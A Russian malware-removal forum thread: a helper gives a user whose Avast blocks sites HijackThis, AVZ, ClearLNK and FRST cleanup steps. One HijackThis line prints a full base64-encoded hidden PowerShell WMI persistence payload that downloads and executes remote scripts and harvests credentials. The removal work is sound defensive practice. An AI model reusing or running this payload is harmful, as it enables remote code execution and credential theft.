Аваст постоянно выдает сообщения о блокировке сайтов

[sokirani]

[Info_bot]

Уважаемый(ая) sokirani, спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.

[Vvvyg]

Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки:

Код:

O7 - IPSec: Name: netbc (2020/06/03) - {4e2ad893-370c-4a8b-a999-fd29bec4024b} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block
O22 - Task: \Microsoft\Windows Defender\MP Scheduled Scan - d:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan (file missing)
O25 - WMI Event: Systems Manage Consumer - Systems Manage Filter - Event="__InstanceModificationEvent WITHIN 5601 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  powershell.exe -NoP -NonI -W Hidden -E bgBlAHQAIABzAHQAYQByAHQAIABSAHAAYwBTAHMAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBuAGUAdAAgAHMAdABhAHIAdAAgAFIAcABjAEwAbwBjAGEAdABvAHIAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBuAGUAdAAgAHMAdABhAHIAdAAgAFIAZQBtAG8AdABlAFIAZQBnAGkAcwB0AHIAeQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKAG4AZQB0ACAAcwB0AGEAcgB0ACAAUgBwAGMARQBwAHQATQBhAHAAcABlAHIAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBuAGUAdAAgAHMAdABhAHIAdAAgAFcAaQBuAG0AZwBtAHQAIAB8ACAATwB1AHQALQBOAHUAbABsAA0ACgBuAGUAdAAgAHMAdABhAHIAdAAgAFcAaQBuAFIATQAgAHwAIABPAHUAdAAtAE4AdQBsAGwADQAKAEcAZQB0AC0AUAByAG8AYwBlAHMAcwAgAC0ATgBhAG0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAB8AEYAbwByAGUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAaQBmACgAJABfAC4AaQBkACAALQBuAGUAIAAkAHAAaQBkACkAewBTAHQAbwBwAC0AUAByAG8AYwBlAHMAcwAgAC0AaQBkACAAJABfAC4AaQBkACAALQBGAG8AcgBjAGUAfQB9AA0ACgAkAHMAZQA9AEAAKAAoACcAbwB3AGEALgBjAG8AbgBmADEAZwAuAGMAbwBtACcAKQAsACgAJwBiAG8AeAAuAGMAbwBuAGYAMQBnAC4AYwBvAG0AJwApACkADQAKACQAbgBpAGMAIAA9ACAAJABzAGUAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQANAAoAJABuAGkAYwA9ACQAbgBpAGMAKwAoACcAOgAnACsAJwA0ADQAMwAnACkADQAKACQAdgBlAHIAPQAiACAAIgANAAoAdwBoAGkAbABlACgAJAB0AHIAdQBlACkAewANAAoAIAAgACAAIAB0AHIAeQB7AA0ACgAgACAAIAAgACAAIAAgACAAJAB2AGUAcgA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAkAG4AaQBjAC8AdwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkADQAKACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAfQAgAGMAYQB0AGMAaAAgAHsADQAKACAAIAAgACAAIAAgACAAIABlAGMAaABvACAAIgBlAHIAcgBvAHIAIQAiAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQANAAoAfQANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewANAAoAIAAgACAAIAAkAHYAZQByAF8AdABtAHAAPQAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAVwBpAG4AZABvAHcAXwBDAG8AcgBlAF8ARgBsAHUAcwBoAF8AQwBhAGMAaAAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwB2AGUAcgAnAF0ALgBWAGEAbAB1AGUADQAKACAAIAAgACAAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJAB2AGUAcgBfAHQAbQBwACkAewANAAoAIAAgACAAIAAgACAAIAAgAHcAaABpAGwAZQAoACQAdAByAHUAZQApAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhAD0AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvACQAbgBpAGMALwB3AC8AcAAzADIALgBwAHMAMQAiACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYgByAGUAYQBrAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9ACAAYwBhAHQAYwBoACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABlAGMAaABvACAAIgBlAHIAcgBvAHIAIQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAEkARQBYACAAJABkAGEAdABhAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4ADQAKACAAIAAgACAAfQANAAoAfQANAAoAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBXAGkAbgBkAG8AdwBfAEMAbwByAGUAXwBGAGwAdQBzAGgAXwBDAGEAYwBoACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGYAdQBuAHMAJwBdAC4AVgBhAGwAdQBlAA0ACgAkAGQAZQBmAHUAbgA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAZgB1AG4AcwApACkADQAKAGkAZQB4ACAAJABkAGUAZgB1AG4ADQAKAEkAbgB2AG8AawBlAC0AawBuAG8AYwBrAG4AbwBjAGsAIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQARQBBAE0AUQBBAHUAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATgBBAEEAdwBBAEMANABBAE4AUQBBADUAQQBEAG8AQQBOAEEAQQAwAEEARABNAEEATAB3AEIAMgBBAEQAawBBAEwAdwBCADMAQQBHAGsAQQBiAGcAQgBrAEEARwA4AEEAZAB3AEIAegBBAEgAVQBBAGMAQQBCAGsAQQBHAEUAQQBkAEEAQgBsAEEAQwA4AEEAYwBnAEIAbABBAEcAUQBBAGEAUQBCAHkAQQBDADgAQQBiAFEAQgAxAEEASABZAEEATgBBAEIAMwBBAEgAVQBBAGMAZwBCAGwAQQBHAFEAQQBhAFEAQgB5AEEAQwA0AEEAWQB3AEIAaABBAEcASQBBAFAAdwBBAHgAQQBEAFEAQQBPAEEAQQAyAEEARABFAEEATwBRAEEAMwBBAEQAUQBBAE0AZwBBAE4AQQBBAG8AQQAiAA0ACgBHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAXwBfAEYAaQBsAHQAZQByAFQAbwBDAG8AbgBzAHUAbQBlAHIAQgBpAG4AZABpAG4AZwAgAC0ATgBhAG0AZQBzAHAAYQBjAGUAIAByAG8AbwB0AFwAcwB1AGIAcwBjAHIAaQBwAHQAaQBvAG4AIAB8ACAAVwBoAGUAcgBlAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGYAaQBsAHQAZQByACAALQBuAG8AdABtAGEAdABjAGgAIAAnAFMAeQBzAHQAZQBtAHMAIABNAGEAbgBhAGcAZQAnAH0AIAB8AFIAZQBtAG8AdgBlAC0AVwBtAGkATwBiAGoAZQBjAHQADQAKAA0ACgBSAHUAbgBEAEQATwBTACAAIgBjAG8AaABlAHIAbgBlAGMAZQAuAGUAeABlACIADQAKAEsAaQBsAGwAQgBvAHQAKAAnAFcAaQBuAGQAbwB3AF8AQwBvAHIAZQBfAEYAbAB1AHMAaABfAEMAYQBjAGgAJwApAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAHQAIABpAG4AIAAkAHQAYwBwAGMAbwBuAG4AKQANAAoAewANAAoAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIABpAGYAIAAoACEAKAAkAGwAaQBuAGUAIAAtAGkAcwAgAFsAYQByAHIAYQB5AF0AKQApAHsAYwBvAG4AdABpAG4AdQBlAH0ADQAKACAAIAAgACAAaQBmACAAKAAoACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADMAMwAzADMAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA1ADUANQA1ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADEANAA0ADQANAAiACkAKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABlAHYAaQBkAD0AJABsAGkAbgBlAFsALQAxAF0ADQAKACAAIAAgACAAIAAgACAAIABHAGUAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAGkAZAAgACQAZQB2AGkAZAAgAHwAIABzAHQAbwBwAC0AcAByAG8AYwBlAHMAcwAgAC0AZgBvAHIAYwBlAA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAA0ACgBbAGkAbgB0AF0AJAB0AGkAbQBlAG4AbwB3ACAAPQAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAFMAdABhAHIAdAAgACgARwBlAHQALQBEAGEAdABlACAAIgAwADEALwAwADEALwAxADkANwAwACIAKQAgAC0ARQBuAGQAIAAoAEcAZQB0AC0ARABhAHQAZQApACkALgBUAG8AdABhAGwAUwBlAGMAbwBuAGQAcwANAAoAJABmAGwAYQBnAHQAaQBtAGUAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFcAaQBuAGQAbwB3AF8AQwBvAHIAZQBfAEYAbAB1AHMAaABfAEMAYQBjAGgAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAZgBsAGEAZwAnAF0ALgBWAGEAbAB1AGUADQAKAGkAZgAoACgAJAB0AGkAbQBlAG4AbwB3AC0AJABmAGwAYQBnAHQAaQBtAGUAKQAgAC0AZwB0ACAAMQA4ADAAMAAwACkAewANAAoAIAAgACAAIAAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABNAGEAbgBhAGcAZQBtAGUAbgB0AC4ATQBhAG4AYQBnAGUAbQBlAG4AdABDAGwAYQBzAHMAKAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAVwBpAG4AZABvAHcAXwBDAG8AcgBlAF8ARgBsAHUAcwBoAF8AQwBhAGMAaAAnACkADQAKACAAIAAgACAAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBmAGwAYQBnACcAIAAsACQAdABpAG0AZQBuAG8AdwApAA0ACgAgACAAIAAgACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAANAAoAIAAgACAAIAAkAE4AVABMAE0APQAkAEYAYQBsAHMAZQANAAoAIAAgACAAIAAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AFcAaQBuAGQAbwB3AF8AQwBvAHIAZQBfAEYAbAB1AHMAaABfAEMAYQBjAGgAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBpAG0AaQAnAF0ALgBWAGEAbAB1AGUADQAKACAAIAAgACAAJABhACwAIAAkAE4AVABMAE0APQAgAEcAZQB0AC0AYwByAGUAZABzACAAJABtAGkAbQBpACAAJABtAGkAbQBpAA0ACgAgACAAIAAgACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAVwBpAG4AZABvAHcAXwBDAG8AcgBlAF8ARgBsAHUAcwBoAF8AQwBhAGMAaAAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpAHAAcwB1ACcAXQAuAFYAYQBsAHUAZQANAAoAIAAgACAAIAAkAGkAMQA3ACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBXAGkAbgBkAG8AdwBfAEMAbwByAGUAXwBGAGwAdQBzAGgAXwBDAGEAYwBoACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAMQA3ACcAXQAuAFYAYQBsAHUAZQANAAoAIAAgACAAIAAkAHMAYwBiAGEAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBXAGkAbgBkAG8AdwBfAEMAbwByAGUAXwBGAGwAdQBzAGgAXwBDAGEAYwBoACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAHMAYwAnAF0ALgBWAGEAbAB1AGUADQAKACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAcwBjAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcwBjAGIAYQApAA0ACgAgACAAIAAgAEkAbgB2AG8AawBlAC0AQgByAGUAeABpAHQAIAAtAHMAYwBjAGMAYwBjAGMAIAAkAHMAYwAgAC0AaQBwAHMAdQAgACQAaQBwAHMAdQAgAC0AaQAxADcAIAAkAGkAMQA3ACAALQBuAGkAYwAgACQAbgBpAGMAIAAtAGEAIAAkAGEAIAAtAE4AVABMAE0AIAAkAE4AVABMAE0ADQAKAH0ADQAKAGUAeABpAHQA

Выполните скрипт в AVZ из папки Autologger:

Код:

begin
SearchRootkit(true, true);
 TerminateProcessByName('c:\programdata\microsoft\devicesync\systemsync\cohernece.exe');
 QuarantineFile('c:\programdata\microsoft\devicesync\systemsync\cohernece.exe', '');
 QuarantineFile('C:\Windows\System32\Drivers\anjclr16.SYS', '');
 QuarantineFileF('c:\programdata\microsoft\devicesync\systemsync', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js*, *.tmp*', false, '', 0 , 0);
 DeleteFile('c:\programdata\microsoft\devicesync\systemsync\cohernece.exe', '');
 QuarantineFile('C:\Program Files\Windows NT\GlassCMD\svchost.exe', '');
 DeleteFileMask('c:\programdata\microsoft\devicesync\systemsync', '*', true);
 DeleteDirectory('c:\programdata\microsoft\devicesync\systemsync');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
 DeleteSchedulerTask('Microsoft Assist Job');
 DeleteSchedulerTask('SystemFlushDns');
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 3, 3, true);
BC_Activate;
RebootWindows(true);
end.

Компьютер перезагрузится.

Выполните в AVZ скрипт:

Код:

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке Прислать запрошенный карантин над над первым сообщением в теме.

Скачайте, распакуйте и запустите утилиту ClearLNK. Скопируйте текст ниже в окно утилиты и нажмите "Лечить".

Код:

>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\DirectVobSub.lnk"   -> ["C:\Windows\System32\rundll32.exe"  =>> "C:\Program Files\K-Lite Codec Pack\Filters\DirectVobSub\vsfilter.dll",DirectVobSub] -> ( is missing)
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\ffdshow VFW interface.lnk"    -> ["C:\Windows\System32\rundll32.exe"  =>> "C:\Windows\system32\ff_vfw.dll",configureVFW] -> ( is missing)
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Audio.lnk"      -> ["C:\Windows\System32\rundll32.exe"  =>> "C:\Program Files\K-Lite Codec Pack\Filters\LAV\lavaudio.ax",OpenConfiguration] -> ( is missing)
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Video.lnk"      -> ["C:\Windows\System32\rundll32.exe"  =>> "C:\Program Files\K-Lite Codec Pack\Filters\LAV\lavvideo.ax",OpenConfiguration] -> ( is missing)
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\LAV Splitter.lnk"   -> ["C:\Windows\System32\rundll32.exe"  =>> "C:\Program Files\K-Lite Codec Pack\Filters\LAV\lavsplitter.ax",OpenConfiguration] -> ( is missing)
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\Xvid VFW.lnk"       -> ["C:\Windows\System32\rundll32.exe"  =>> "C:\Windows\system32\xvidvfw.dll",Configure] -> ( is missing)
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\K-Lite Codec Pack\Configuration\x264 VFW (x86).lnk"           -> ["C:\Windows\System32\rundll32.exe"  =>> "C:\Windows\system32\x264vfw.dll",Configure] -> ( is missing)
>>>  "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Портативные программы\Система\Блокировка AUTORUN.lnk"         -> ["C:\Program Files\Портативные программы\Система\Блокировка AUTORUN USB_CD_DVD\USBGuard.exe"]

Отчёт о работе прикрепите.

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).